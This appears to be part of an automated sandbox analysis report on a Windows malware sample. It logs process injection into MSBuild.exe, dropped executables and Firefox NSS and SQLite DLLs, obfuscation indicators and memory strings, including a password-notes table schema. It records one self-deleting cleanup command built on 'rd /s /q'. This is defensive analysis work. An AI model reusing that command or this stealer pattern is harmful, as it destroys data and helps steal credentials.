Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: DAKEBA.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\f1r6P3j3g7.exe "C:\Users\user\Desktop\f1r6P3j3g7.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 840
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: f1r6P3j3g7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: f1r6P3j3g7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000003.00000002.2206196527.00000000359F7000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000003.00000002.2195422275.0000000029B1F000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr

Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00418A63

PE file contains sections with non-standard names

Source: sql[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F71AD push ecx; ret	0_2_008F71C0
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C13A push ecx; ret	0_2_0094C14D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C2D8 push ds; retn 0003h	0_2_0094C38D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C39E push ds; retn 0003h	0_2_0094C38D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C454 push ds; retf 0003h	0_2_0094C455
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094E9ED push 0000004Ch; iretd	0_2_0094E9FE
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0093ADAD push ecx; ret	0_2_0093ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042F262 push ecx; ret	3_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00422E59 push esi; ret	3_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041DED5 push ecx; ret	3_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDB536 push ecx; ret	3_2_6CBDB549
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D071AD push ecx; ret	10_2_00D071C0

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\KEGIDHJKKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\KEGIDHJKKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00418A63

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
